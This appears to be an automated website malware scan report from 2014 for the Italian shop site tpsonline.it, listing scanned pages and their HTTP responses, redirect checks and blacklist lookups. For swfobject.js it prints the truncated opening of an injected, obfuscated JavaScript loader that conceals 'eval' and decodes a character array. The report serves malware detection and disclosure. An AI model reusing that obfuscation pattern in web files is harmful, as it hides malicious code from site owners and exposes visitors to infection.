Scanned pages/files
| Request | Server response | Status |
http://tpsonline.it/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:21:39 GMT Location: http://www.tpsonline.it/ Server: Apache Content-Length: 232 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.tpsonline.it/ | 200 OK Content-Length: 58452 Content-Type: text/html | clean |
http://www.tpsonline.it/includes/swfobject.js | 200 OK Content-Length: 10723 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{q=document.createElement("div");}catch(q){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(40,101,115,107,99,115,103,108,110,31,38,38,32,122 Antivirus reports:
| ||
http://codice.shinystat.com/cgi-bin/getcod.cgi?USER=tpsonline | 200 OK Content-Length: 5609 Content-Type: application/x-javascript | clean |
http://tpsonline.it/showCart.asp | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:21:42 GMT Location: http://www.tpsonline.it/showCart.asp Server: Apache Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.tpsonline.it/showcart.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:42 GMT Location: message.asp?message=Il+tuo+carrello+%E8+vuoto%2E Server: Microsoft-IIS/6.0 Content-Length: 169 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=PPNFACBAAMDOAHDAGEHDGAFE; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/message.asp?message=il+tuo+carrello+%e8+vuoto%2e | 200 OK Content-Length: 33974 Content-Type: text/html | clean |
http://www.tpsonline.it/showCart.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:43 GMT Location: message.asp?message=Il+tuo+carrello+%E8+vuoto%2E Server: Microsoft-IIS/6.0 Content-Length: 169 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=BAOFACBAJDHDJPKCKBFIHLMP; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://tpsonline.it/chi_siamo.asp | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 04 Oct 2014 20:21:44 GMT Location: http://www.tpsonline.it/chi_siamo.asp Server: Apache Content-Length: 245 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.tpsonline.it/chi_siamo.asp | 200 OK Content-Length: 39604 Content-Type: text/html | clean |
http://www.tpsonline.it/condizioni.asp | 200 OK Content-Length: 55333 Content-Type: text/html | clean |
http://www.tpsonline.it/privacy.asp | 200 OK Content-Length: 43253 Content-Type: text/html | clean |
http://www.tpsonline.it/pagamenti.asp | 200 OK Content-Length: 37839 Content-Type: text/html | clean |
http://www.tpsonline.it/spedizioni.asp | 200 OK Content-Length: 36834 Content-Type: text/html | clean |
http://www.tpsonline.it/faq.asp | 200 OK Content-Length: 46154 Content-Type: text/html | clean |
http://www.tpsonline.it/customerWishListView.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:54 GMT Location: customerAuthenticateForm.asp?redirectUrl= Server: Microsoft-IIS/6.0 Content-Length: 162 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=IAOFACBABIOKKNIDKLIBJIAE; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/customerauthenticateform.asp?redirecturl= | 200 OK Content-Length: 34774 Content-Type: text/html | clean |
http://www.tpsonline.it/download.asp | 200 OK Content-Length: 51613 Content-Type: text/html | clean |
http://www.tpsonline.it/customerUtilitiesMenu.asp | HTTP/1.1 302 Object moved Cache-Control: private Date: Sat, 04 Oct 2014 20:21:56 GMT Location: customerAuthenticateForm.asp?redirectUrl= Server: Microsoft-IIS/6.0 Content-Length: 162 Content-Type: text/html MicrosoftOfficeWebServer: 5.0_Pub Set-Cookie: ASPSESSIONIDSQCBBSRT=MAOFACBAJOEDOHLJBBFJELNH; path=/ X-Powered-By: ASP.NET | clean |
http://www.tpsonline.it/listCategoriesAndProducts.asp?idCategory=133&ido=133 | 200 OK Content-Length: 35291 Content-Type: text/html | clean |
http://www.tpsonline.it/listCategoriesAndProducts.asp?idCategory=166&ido=133 | 200 OK Content-Length: 41552 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tpsonline.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:21:39 GMT
Location: http://www.tpsonline.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
GET / HTTP/1.1
Host: tpsonline.it
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:21:39 GMT
Location: http://www.tpsonline.it/
Server: Apache
Content-Length: 232
Content-Type: text/html; charset=iso-8859-1
...232 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tpsonline.it
Referer: http://www.google.com/search?q=tpsonline.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tpsonline.it
Referer: http://www.google.com/search?q=tpsonline.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tpsonline.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tpsonline.it/
Result: tpsonline.it is not infected or malware details are not published yet.
Result: tpsonline.it is not infected or malware details are not published yet.